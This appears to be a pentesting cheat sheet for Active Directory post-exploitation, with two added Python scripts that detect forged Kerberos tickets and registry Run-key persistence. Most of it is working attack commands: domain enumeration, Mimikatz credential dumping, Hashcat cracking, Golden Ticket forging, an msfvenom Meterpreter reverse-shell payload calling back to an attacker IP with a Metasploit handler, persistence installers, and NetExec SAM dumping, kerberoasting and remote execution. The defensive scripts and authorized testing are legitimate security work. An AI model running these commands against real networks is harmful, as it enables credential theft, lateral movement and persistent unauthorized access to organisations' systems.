After getting a foot in the door in a pentesting scenario or competition, it is time to gather more data and credentials and to create persistence:
- PowerView – Enumerating the domain.
- SharpHound – Hammering that DC to extract all available data.
- BloodHound – Analysing the extracted data from the domain.
- Mimikatz – Dumping hashes.
- Hashcat – Cracking the dumped hashes.
- Golden Ticket – Getting access to other machines.
- Msfvenom – Crafting a payload.
- Metasploit – Getting the reverse shell and creating persistence.
- NetExec – Exploration and exploitation framework.
Enumerating the domain with the PowerShell script PowerView – Full command list available at [Link]:
powershell -ep bypass
. .\PATH\PowerView.ps1
Enumerate Domain Users
Get-NetUser | select cn
Enumerate Computers
Get-NetComputer -FullData | select operatingsystem
Enumerate Groups
Get-NetGroup -GroupName *admin*
Enumerate Shares
Invoke-ShareFinder
Extract the loot from any computer joined to the domain with the SharpHound script:
powershell -ep bypass
. .\PATH\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip
Copy the file over to the attacker's machine.
Explore the domain with BloodHound Community Edition [Link].
Installing the tool on the attacker machine:
sudo apt update && sudo apt install docker.io docker-compose -y
curl -L https://ghst.ly/getbhce | sudo docker compose -f - up
sudo docker-compose logs bloodhound | grep 'Password'
Navigate to http://localhost:8080/ and log in with the acquired password for the user Admin (change it!).
Search for import/ingest and provide .zip or the extracted .json files.
After some time the data will be ready for queries in the Explore tab.
Dumping hashes with Mimikatz:
mimikatz.exe
privilege::debug
lsadump::lsa /patch
Cracking the dumped hashes with Hashcat (mode 1000 is NTLM):
hashcat -m 1000 hashes.lst /usr/share/wordlists/rockyou.txt
Creating a Golden Ticket with Mimikatz (the hash passed to kerberos::golden is the krbtgt NT hash obtained with lsadump::lsa; the option is /krbtgt:, not /userName:):
lsadump::lsa /inject /name:userName
kerberos::golden /user:administrator /domain:domain.local /sid:S-3-5-41-845420856-2351964987-986696098 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd
Getting access to other machines with the Golden Ticket in the newly opened window:
dir \\ComputerA\c$
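From the defender's side, the forged ticket above stands out because Mimikatz's defaults do not match domain policy: a Golden Ticket is valid for ten years, while Active Directory's default maximum TGT lifetime is 10 hours with a 7-day renewal window, and a ticket forged from the NT hash is RC4-encrypted even in a domain that normally issues AES tickets. The following Python check is an added example (not part of the original page or of any of the tools listed); it parses `klist` output for cached tickets and flags the ones whose lifetime or encryption type is out of policy. The `klist` text is constructed for the example, and the policy thresholds are the AD defaults passed in as parameters.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of Windows `klist` output (not captured from a real host).
# Ticket #0 has a ten-year lifetime and an RC4 TGT; ticket #1 is a normal AES TGT.
SAMPLE_KLIST = """\
Cached Tickets: (2)

#0>     Client: administrator @ DOMAIN.LOCAL
        Server: krbtgt/DOMAIN.LOCAL @ DOMAIN.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 1/1/2024 10:00:00 (local)
        End Time:   12/29/2033 10:00:00 (local)
        Renew Time: 12/29/2033 10:00:00 (local)

#1>     Client: jdoe @ DOMAIN.LOCAL
        Server: krbtgt/DOMAIN.LOCAL @ DOMAIN.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 1/1/2024 10:00:00 (local)
        End Time:   1/1/2024 20:00:00 (local)
        Renew Time: 1/8/2024 10:00:00 (local)
"""

TIME_FMT = "%m/%d/%Y %H:%M:%S"
FIELD_RE = re.compile(
    r"\s+(Server|KerbTicket Encryption Type|Start Time|End Time|Renew Time):\s+(.+)"
)


def parse_klist(text):
    """Split klist output into one dict per cached ticket."""
    tickets = []
    current = None
    for line in text.splitlines():
        head = re.match(r"#(\d+)>\s+Client:\s+(.+)", line)
        if head:
            current = {"index": int(head.group(1)), "client": head.group(2).strip()}
            tickets.append(current)
            continue
        if current is None:
            continue
        field = FIELD_RE.match(line)
        if field:
            key, val = field.group(1), field.group(2).strip()
            if key.endswith("Time"):
                # klist prints local times with a "(local)" suffix; strip it before parsing.
                val = datetime.strptime(val.replace(" (local)", ""), TIME_FMT)
            current[key] = val
    return tickets


def flag_suspicious(tickets, max_lifetime=timedelta(hours=10), max_renew=timedelta(days=7)):
    """Return (client, reasons) for tickets that violate the given policy limits.

    The defaults are the Active Directory defaults (10 h ticket lifetime, 7 d renewal);
    pass the values from the domain's Kerberos policy for a real host.
    """
    findings = []
    for t in tickets:
        reasons = []
        lifetime = t["End Time"] - t["Start Time"]
        renew = t["Renew Time"] - t["Start Time"]
        if lifetime > max_lifetime:
            reasons.append(f"ticket lifetime of {lifetime.days} days exceeds policy")
        if renew > max_renew:
            reasons.append(f"renewal window of {renew.days} days exceeds policy")
        is_tgt = t.get("Server", "").startswith("krbtgt/")
        if is_tgt and "RC4" in t.get("KerbTicket Encryption Type", ""):
            reasons.append("RC4-encrypted TGT (forged tickets built from the NT hash use RC4)")
        if reasons:
            findings.append((t["client"], reasons))
    return findings


if __name__ == "__main__":
    for client, reasons in flag_suspicious(parse_klist(SAMPLE_KLIST)):
        print(client)
        for r in reasons:
            print("  -", r)
```

On a real host feed the script `klist` output captured from the user's session, and take the thresholds from `Get-ADDefaultDomainPasswordPolicy` or the Kerberos policy GPO rather than the defaults. Encryption type alone is only a hint: a domain that still allows RC4 will issue legitimate RC4 tickets, so the lifetime check is the stronger signal.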
CREATING PERSISTENCE
Crafting a payload with Msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.99 LPORT=4444 -f exe -o shell.exe
On the attacker side start a listener with Metasploit – module library available at [Link]:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run
background
Applying persistence to the granted session with the Persistent Registry Startup Payload Installer:
use exploit/windows/local/persistence
sessions
set session 1
See also exploit/windows/local/persistence_service for the Persistent Service Installer.
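A registry startup installer survives reboots precisely because the Run keys are evaluated at every logon, so those keys are also where a defender looks for it. The following Python audit is an added example (not from the page or from Metasploit); it parses the text layout that `reg query` prints for a Run key and flags entries whose target lives in a user-writable staging directory or is a script rather than an installed binary. The `reg query` sample is constructed, and the heuristics are general ones for startup persistence, not a description of the module's exact artefacts.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample in the layout `reg query` prints for a Run key (not from a real host).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater     REG_SZ    C:\Users\jdoe\AppData\Local\Temp\kQhfYt.vbs
    Steam       REG_SZ    "C:\Program Files (x86)\Steam\steam.exe" -silent
"""

# One value per line: <name> <type> <data>, indented under the key path.
ENTRY_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")
# Directories any user can write to; a legitimate installer rarely launches from them.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
SCRIPT_EXT = {".vbs", ".js", ".bat", ".cmd", ".ps1", ".hta"}


def parse_run_entries(text):
    """Return one dict per value listed under the queried Run key."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"name": m.group(1), "type": m.group(2), "data": m.group(3).strip()})
    return entries


def target_path(data):
    """Pull the launched file out of the value data (quoted path, or first token)."""
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0] if data else ""


def audit_run_entries(entries):
    """Return (value name, target path, reasons) for entries worth a closer look."""
    findings = []
    for e in entries:
        path = target_path(e["data"])
        lowered = path.lower()
        reasons = []
        if any(d in lowered for d in USER_WRITABLE):
            reasons.append("target lives in a user-writable staging directory")
        if PureWindowsPath(path).suffix.lower() in SCRIPT_EXT:
            reasons.append("target is a script rather than an installed binary")
        if reasons:
            findings.append((e["name"], path, reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in audit_run_entries(parse_run_entries(SAMPLE_REG_QUERY)):
        print(f"{name}: {path}")
        for r in reasons:
            print("  -", r)
```

Run it against the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and the HKLM counterpart, and extend `USER_WRITABLE` with any staging directories your own environment treats as untrusted. The persistence_service variant mentioned above leaves a service rather than a Run value, so it needs a separate check of the Services key or `sc query`.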
EXPLORING NETWORK WITH NETEXEC
NetExec is a network service exploitation tool used by pentesters [Link].
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Basic commands:
nxc smb 10.0.0.0/24
nxc smb 10.0.0.0/24 -u '' -p '' --users
nxc smb 10.0.0.0/24 -u 'guest' -p '' --users
nxc smb 10.0.0.0/24 -u 'guest' -p '' --shares
nxc smb 10.0.0.10 -u 'user' -p 'pass' --sam
nxc smb 10.0.0.10 -u 'user' -p 'pass' --loggedon-users
nxc smb 10.0.0.10 -u 'user' -p 'pass' -M schtask_as -o USER=Administrator
nxc smb 10.0.0.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
nxc mssql 10.0.0.10 -u 'user' -p 'pass'
nxc ldap 10.0.0.10 -u 'user' -p 'pass' --bloodhound --collection All
nxc ldap 10.0.0.10 -u 'user' -p 'pass' --kerberoast file.txt
nxc winrm 10.0.0.10 -u 'user' -p 'pass' -X 'whoami'